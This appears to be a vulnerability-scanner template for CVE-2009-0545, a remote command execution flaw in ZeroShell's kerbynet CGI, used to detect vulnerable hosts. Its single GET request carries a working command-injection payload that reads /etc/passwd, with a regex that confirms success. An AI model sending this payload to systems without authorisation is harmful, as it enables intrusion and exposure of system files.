id: CVE-2009-0545 info: name: ZeroShell <= 1.0beta11 Remote Code Execution author: geeknik severity: critical description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action. remediation: | Upgrade to a patched version of ZeroShell. reference: - https://www.exploit-db.com/exploits/8023 - https://nvd.nist.gov/vuln/detail/CVE-2009-0545 - http://www.zeroshell.net/eng/announcements/ - http://www.ikkisoft.com/stuff/LC-2009-01.txt - http://www.vupen.com/english/advisories/2009/0385 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C cvss-score: 10 cve-id: CVE-2009-0545 cwe-id: CWE-20 epss-score: 0.9717 epss-percentile: 0.99741 cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:* metadata: max-request: 1 vendor: zeroshell product: zeroshell tags: edb,cve,cve2009,zeroshell,kerbynet,rce http: - method: GET path: - "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22" matchers: - type: regex part: body regex: - "root:.*:0:0:" # digest: 4b0a00483046022100b2b78aaeee485a69c36ab138fcb82e4834d1d7f4d7c068fc601433e16880b092022100b823c394c14d0dc91993b32f8b129fd60a99b3855704b72e0f55e16266ab30ae:922c64590222798bb761d5b6d8e72950